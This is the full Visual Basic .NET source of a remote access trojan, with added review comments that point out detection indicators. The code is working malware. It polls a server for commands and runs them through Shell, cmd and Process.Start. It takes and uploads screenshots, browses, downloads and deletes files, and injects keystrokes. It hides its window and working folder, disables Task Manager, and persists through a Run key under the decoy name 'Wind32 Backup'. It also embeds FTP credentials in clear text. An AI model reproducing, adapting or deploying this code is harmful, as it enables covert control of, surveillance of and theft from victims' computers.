rat
Imports System.IO
Imports System.Runtime.InteropServices
Public Class Form1
'Field declarations for Form1: response codes, server endpoints, working paths and Win32 imports.
'RESPONSE CODES
' 0: command executed
' 1: error
' 2: unknown command
' 3: test response
'FTP connection variables
'NOTE(review): host, user name and password are embedded in clear text, so anyone holding this source or the
'compiled binary can recover them. Within this class they are only read by the "upload" branch of leggo_comando.
Dim host As String = "ftp://ftp.hacking58.altervista.org/rat1/" 'web install folder
Dim user As String = "hacking58"
Dim pass As String = "ciapacavi2015"
'HTTP connection variables
'NOTE(review): loopback address, so this copy looks configured for local testing. leggo_comando, scatta_screen and
'risposta use literal URLs with the same prefix instead of reading this field.
Dim hoster As String = "http://127.0.0.1/rat/new/" 'web install folder
'name of the working folder (inside Documents)
Dim cartella_generale As String = "rattone"
'process to start after the RAT has started
Dim processo_finale As String = ""
'do not modify!!
'Working files under C:\Users\<user>\Documents\<cartella_generale>\ ; these fixed names are on-disk indicators
'an investigator can look for.
Dim p_screenshot As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\screen.jpeg"
Dim p_command As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\command.txt"
Dim p_nulled As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\nulled.txt"
'Single WebClient instance shared by the command poll, the screenshot upload and the response call.
Dim webClient As New System.Net.WebClient
'to be able to click without administrative permissions
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
'to be able to control the volume
<DllImport("user32.dll", SetLastError:=True, CharSet:=CharSet.Auto)> Private Shared Function SendMessage(ByVal hWnd As IntPtr, ByVal Msg As UInteger, ByVal wParam As IntPtr, ByVal lParam As IntPtr) As IntPtr
End Function
'Message id and command codes passed to SendMessage; callers multiply the command by &H10000 to build lParam.
Const WM_APPCOMMAND As UInteger = &H319
Const APPCOMMAND_VOLUME_UP As UInteger = &HA
Const APPCOMMAND_VOLUME_DOWN As UInteger = &H9
Const APPCOMMAND_VOLUME_MUTE As UInteger = &H8
'Fetches the current command text over HTTP, runs the matching action and reports the outcome through risposta.
'Timer1 is stopped while the command is handled and restarted at the end, so one call handles at most one command.
'NOTE(review): the command channel is plain HTTP and no authentication or integrity check is visible here; whatever
'text the server returns is acted on. For detection, the repeated GET of comando.txt followed by a GET of
'ricevitore.php?risp=... at the Timer1 interval is a regular beacon pattern in proxy or flow logs, and the
'shell / cmd / process branches show up as child processes of this executable in process-creation telemetry.
Sub leggo_comando()
Timer1.Stop()
Try
Dim sline As String = webClient.DownloadString("http://127.0.0.1/rat/new/comando.txt")
If Not sline Is Nothing Then
'--- Commands matched by exact equality (no argument) ---
If sline = "" Then
'empty command text: nothing is run and no response is sent
ElseIf sline = "screenshot" Then
'scatta_screen sends its own response; a second risposta(0) follows here
scatta_screen()
risposta(0)
ElseIf sline = "mouse" Then
'moves the pointer to the fixed position (1, 1)
Cursor.Position = New Point(1, 1)
risposta(0)
ElseIf sline = "google" Then
'opens the URL through the shell's default handler
Process.Start("http://www.google.com")
risposta(0)
ElseIf sline = "click-sx" Then
'injects a synthetic mouse event with flag &H4
mouse_event(&H4, 0, 0, 0, 0)
risposta(0)
ElseIf sline = "click-dx" Then
'injects a synthetic mouse event with flag &H2
mouse_event(&H2, 0, 0, 0, 0)
risposta(0)
ElseIf sline = "reset-command" Then
'no local action, only an acknowledgement
risposta(0)
ElseIf sline = "disks" Then
'Enumerates all drives and sends name and type for each; label, format and size figures are added only
'for drives that report IsReady. Fields are separated by "|" and a ready drive's record ends with "@".
Dim totale As String
Dim allDrives() As DriveInfo = DriveInfo.GetDrives()
Dim d As DriveInfo
For Each d In allDrives
totale = totale & d.Name & "|"
totale = totale & "" & d.DriveType & "|"
If d.IsReady = True Then
totale = totale & "" & d.VolumeLabel & "|"
totale = totale & "" & d.DriveFormat & "|"
totale = totale & "" & d.AvailableFreeSpace & "|"
totale = totale & "" & d.TotalFreeSpace & "|"
totale = totale & "" & d.TotalSize & "@"
End If
Next
risposta("@" & totale)
ElseIf sline = "volume-up" Then
'volume commands are posted to this form's own window handle as WM_APPCOMMAND messages
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_UP * &H10000)
risposta(0)
ElseIf sline = "volume-down" Then
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_DOWN * &H10000)
risposta(0)
ElseIf sline = "volume-mute" Then
SendMessage(Me.Handle, WM_APPCOMMAND, &H200EB0, APPCOMMAND_VOLUME_MUTE * &H10000)
risposta(0)
ElseIf sline = "volume-max" Then
'sends the volume-up message repeatedly; the loop leaves at value = 499
For value As Integer = 0 To 500
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_UP * &H10000)
If (value = 499) Then
Exit For
End If
Next
risposta(0)
ElseIf sline = "exit" Then
'closes the form first, then sends the acknowledgement
Me.Close()
risposta(0)
ElseIf sline = "disable-taskmanager" Then
'the response for this command is sent from inside disabilita_taskmanager
disabilita_taskmanager()
ElseIf sline = "check-startup" Then
'reports the stored My.Settings flag; the registry itself is not re-read here
If My.Settings.avvio_automatico Then
risposta("app in windows startup!")
Else
risposta("No, it isn't at startup!")
End If
ElseIf sline = "test" Then
risposta(3)
ElseIf sline = "set-startup" Then
'the response for this command is sent from inside avvio_automatico
avvio_automatico()
'SECTION RESERVED FOR COMMANDS WITH A PARAMETER
'These branches test InStr(...) > 0, so the keyword is matched anywhere in the line and the first branch
'in this order that matches is the one that runs. The keyword is then removed with Replace and the
'remaining text is used as the argument without further validation.
ElseIf InStr(sline, "dir ") > 0 Then
'lists sub-directory names and files of the given path; reply has the form "@dirs@files", "|"-separated
sline = sline.Replace("dir ", "")
Dim cartelle As String
Dim file As String
For Each Dir As String In System.IO.Directory.GetDirectories(sline)
Dim dirInfo As New System.IO.DirectoryInfo(Dir)
cartelle &= "|" & dirInfo.Name
Next
Dim di As New IO.DirectoryInfo(sline)
Dim diar1 As IO.FileInfo() = di.GetFiles()
Dim dra As IO.FileInfo
For Each dra In diar1
file &= "|" & dra.ToString
Next
Dim rtotal = "@" & cartelle & "@" & file
rtotal = rtotal.Replace("@|", "@")
risposta(rtotal)
ElseIf InStr(sline, "refresh-rate ") > 0 Then
'changes the polling interval; the remaining text is assigned to Timer1.Interval by implicit conversion
sline = sline.Replace("refresh-rate", "")
Timer1.Interval = sline
risposta(0)
ElseIf InStr(sline, "navigate ") > 0 Then
'hands the server-supplied text to Process.Start
sline = sline.Replace("navigate ", "")
Process.Start(sline)
risposta(0)
ElseIf InStr(sline, "process ") > 0 Then
'hands the server-supplied text to Process.Start
sline = sline.Replace("process ", "")
Process.Start(sline)
risposta(0)
ElseIf InStr(sline, "mouse ") > 0 Then
'sets the pointer position from the argument (the string is passed to the Point constructor)
sline = sline.Replace("mouse ", "")
Cursor.Position = New Point(sline)
risposta(0)
ElseIf InStr(sline, "download_exe ") > 0 Then
'acknowledges before doing the work, then replaces Documents\files2.exe with the content fetched from the
'given address. This branch only writes the file; it does not start it.
risposta(0)
sline = sline.Replace("download_exe ", "")
If IO.File.Exists("C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe") Then
IO.File.Delete("C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe")
End If
My.Computer.Network.DownloadFile(sline, "C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe")
ElseIf InStr(sline, "info_msgbox ") > 0 Then
'restores the window, shows the text in an information message box, then minimises again
Me.WindowState = WindowState.Normal
sline = sline.Replace("info_msgbox ", "")
MsgBox(sline, vbOKOnly + vbInformation, "")
Me.WindowState = WindowState.Minimized
risposta(0)
ElseIf InStr(sline, "write ") > 0 Then
'sends the text as keystrokes to whichever window has focus
sline = sline.Replace("write ", "")
SendKeys.Send(sline)
risposta(0)
ElseIf InStr(sline, "shell ") > 0 Then
'runs the server-supplied text through Shell
sline = sline.Replace("shell ", "")
Shell(sline) '
risposta(0)
ElseIf InStr(sline, "upload ") > 0 Then
'Uses the embedded FTP credentials. As written, DownloadFile fetches <host>/risorse/upload/<h-m-s>.txt
'and writes it to the local path given in the command.
Dim datad As String = Now.Hour & "-" & Now.Minute & "-" & Now.Second
sline = sline.Replace("upload ", "")
Dim client As New Net.WebClient
client.Credentials = New Net.NetworkCredential(user, pass)
client.DownloadFile(host & "/risorse/upload/" & datad & ".txt", sline)
risposta(0)
ElseIf InStr(sline, "voice ") > 0 Then
'speaks the text through a late-bound SAPI.spvoice COM object
Dim speech As String = sline.Replace("voice", "")
Dim SAPI = CreateObject("SAPI.spvoice")
SAPI.Speak(speech)
risposta(0)
ElseIf InStr(sline, "cmd ") > 0 Then
'runs the server-supplied text under cmd /c
sline = sline.Replace("cmd ", "")
Shell("cmd /c " & sline) '[future] append & exit at the end, but it might break everything.
risposta(0)
ElseIf InStr(sline, "powershell ") > 0 Then
'launches the fixed command line below; the remaining text is not passed on and no response is sent
sline = sline.Replace("powershell", "")
Shell("cmd /c powershell.exe -exit ")
'file manager
ElseIf InStr(sline, "download ") > 0 Then
'argument has the form <address>|<local path>: the first two "|"-separated parts are used, others ignored
sline = sline.Replace("download ", "")
Dim s As String = sline 'string to split
Dim parts As String() = s.Split(New Char() {"|"c}) 'the character to split on goes between the quotes
Dim part, cache, valore1, valore2 As String
For Each part In parts
If cache = "" Then
valore1 = part
cache = "1"
ElseIf cache = "1" Then
valore2 = part
cache = "3"
End If
Next
My.Computer.Network.DownloadFile(valore1, valore2)
risposta(0)
ElseIf InStr(sline, "delete ") > 0 Then
'deletes the file at the server-supplied path
sline = sline.Replace("delete ", "")
System.IO.File.Delete(sline)
risposta(0)
Else
risposta(2)
'COMMAND NOT RECOGNISED!!
End If
End If
Catch ex As Exception
'Any failure above ends up here and the exception text is sent back to the server.
'The literal compared below is the Italian-language WebClient error text; on a match, an Italian hint to
'check for the necessary permissions is appended to the reply.
If ex.Message = "Eccezione durante una richiesta WebClient." Then
risposta(ex.Message & " Controlla di aver i permessi necessari.")
Else
risposta(ex.Message) 'original note: on errors reply 1 (error); the code sends the exception text instead
End If
End Try
Timer1.Start()
End Sub
'Writes DisableTaskMgr = "1" under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, then replies 0.
'The value is stored from a String variable, so it is written as a string rather than a DWORD.
'Defender note: a write to this value by a non-administrative tool is a strong tampering signal; registry
'auditing (for example Sysmon registry value-set events) on this path will catch it, and deleting the value
'reverses the change.
'No Try/Catch here: a failure propagates to the caller's handler in leggo_comando.
Sub disabilita_taskmanager()
Dim regkey As Microsoft.Win32.RegistryKey
Dim keyValueInt As String = "1"
Dim subKey As String = "Software\Microsoft\Windows\CurrentVersion\Policies\System"
'CreateSubKey opens the key, creating it if it does not exist
regkey = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(subkey:=subKey)
regkey.SetValue("DisableTaskMgr", keyValueInt)
regkey.Close()
risposta(0)
End Sub
'Captures the primary screen, saves it as a JPEG at p_screenshot and uploads it over HTTP.
'Replies 0 on success and 1 on any exception.
'Defender note: the capture is written to a fixed file name (screen.jpeg in the working folder) before upload,
'and the upload is an HTTP request to ricevitore_stream.php, so both file-system and proxy logs carry an indicator.
Sub scatta_screen()
Try
'take the screenshot
Dim bounds As Rectangle
Dim screenshot As System.Drawing.Bitmap
Dim graph As Graphics
'only the primary display is captured
bounds = Screen.PrimaryScreen.Bounds
screenshot = New System.Drawing.Bitmap(bounds.Width, bounds.Height, System.Drawing.Imaging.PixelFormat.Format32bppRgb)
graph = Graphics.FromImage(screenshot)
graph.CopyFromScreen(0, 0, 0, 0, bounds.Size, CopyPixelOperation.SourceCopy)
screenshot.Save(p_screenshot, Imaging.ImageFormat.Jpeg)
'datad is only referenced by the disabled FTP upload below
Dim datad As String = Now.Hour & "-" & Now.Minute & "-" & Now.Second
'Disabled FTP upload variant (kept as in the original):
' Dim request As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(host & "risorse/screenshot/" & datad & ".jpeg"), System.Net.FtpWebRequest)
' request.Credentials = New System.Net.NetworkCredential(user, pass)
' request.Method = System.Net.WebRequestMethods.Ftp.UploadFile
' Dim file() As Byte = System.IO.File.ReadAllBytes(p_screenshot)
' Dim strz As System.IO.Stream = request.GetRequestStream()
' strz.Write(file, 0, file.Length)
' strz.Close()
' strz.Dispose()
'active path: HTTP upload; the second argument is the string "userfile=" followed by the screenshot path
webClient.UploadFile("http://127.0.0.1/rat/new/ricevitore_stream.php", "userfile=" & p_screenshot)
risposta(0)
Catch ex As Exception
'the exception detail is dropped; only the generic error code is reported
risposta(1)
End Try
End Sub
'Form load handler: enforces a single instance, prepares the working folder, hides the window, starts the
'polling timer and registers the startup entry.
'Defender note: after this runs the form has no visible window, icon or taskbar button, so the user sees
'nothing; the process itself remains visible in process listings.
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
'prevent the app from being opened more than once.
If PrevInstance() Then Me.Close()
'optional follow-up process; any exception from starting it is swallowed
'NOTE(review): processo_finale defaults to "", so with the default value this call presumably always throws
Try
Process.Start(processo_finale)
Catch ex As Exception
End Try
install()
'hide every visible trace of the form
Me.Visible = False
Me.Opacity = 0%
Me.ShowIcon = False
Me.ShowInTaskbar = False
Me.Text = ""
Me.ControlBox = False
'set a few things..
'poll interval in milliseconds; can be changed later by the "refresh-rate" command
Timer1.Interval = 1010
Timer1.Start()
'create the nulled.txt marker file if it does not exist yet
If Not IO.File.Exists(p_nulled) Then
IO.File.Create(p_nulled)
End If
avvio_automatico()
End Sub
'Timer tick handler: each tick triggers one poll of the command file through leggo_comando.
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
leggo_comando()
End Sub
'Creates the working folder under the user's Documents directory if needed and marks it hidden + system.
'All exceptions are swallowed, so a failure here is silent.
'Defender note: the folder does not appear in a default Explorer view once +h +s is set; list it with hidden
'and system items shown. The attrib call is a child process of this executable and is visible in
'process-creation logs with the folder path on its command line.
Sub install()
Try
If Not Directory.Exists("C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale) Then
Directory.CreateDirectory("C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale)
End If
'/s and /D apply the attributes to matching files and directories, +h +s set hidden and system
Shell("attrib /s /D +h +s " & "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale)
Catch ex As Exception
End Try
End Sub
'Registers a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run if it is not already present,
'sets the My.Settings.avvio_automatico flag and replies 0; on any exception a failure text is sent instead.
'The path written is the literal in KeyValue.
'Defender note: the value name "Wind32 Backup" under the machine-wide Run key is a persistence indicator;
'autorun inventories and registry value-set auditing on the Run key will surface it.
Sub avvio_automatico()
'REQUIRES ADMINISTRATOR PERMISSION!!
Try
Dim KeyName As String = "Wind32 Backup" 'value name: IT IS NOT SHOWN IN TASK MANAGER UNDER THIS NAME!!
Dim KeyValue As String = "C:\test\test.exe" 'path to launch: if the path ends with t.exe, it will be called t.exe in Task Manager
'the key is opened writable (second argument True)
Dim regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
'both branches set the flag to True; only the first one writes the registry value
If regKey.GetValue(KeyName) = Nothing Then
regKey.SetValue(KeyName, KeyValue, Microsoft.Win32.RegistryValueKind.String)
My.Settings.avvio_automatico = True
Else
My.Settings.avvio_automatico = True
End If
risposta(0)
Catch ex As Exception
'the exception detail is not included in the reply
risposta("failed to set the app as a startup program: ")
End Try
'system.reference.nullable (system.IO);
End Sub
'Reports a result to the server: issues an HTTP GET to ricevitore.php with the value appended to the risp
'query parameter as-is. The response body is read into a local and not used; the function sets no return value.
'a: response code (0-3) or free text such as a listing or an exception message.
'Defender note: results, directory listings and error texts travel in the URL of a plain-HTTP GET, so they
'appear in clear text in proxy and web-server access logs.
Function risposta(a)
Dim qg4p As String = webClient.DownloadString("http://127.0.0.1/rat/new/ricevitore.php?risp=" & a)
End Function
'Returns True when more than one running process has the same process name as the current one.
'UBound of the returned array is greater than 0 only if at least two matching processes exist.
'The check is by process name only.
Function PrevInstance() As Boolean
If UBound(Diagnostics.Process.GetProcessesByName _
(Diagnostics.Process.GetCurrentProcess.ProcessName)) _
> 0 Then
Return True
Else
Return False
End If
End Function
End Class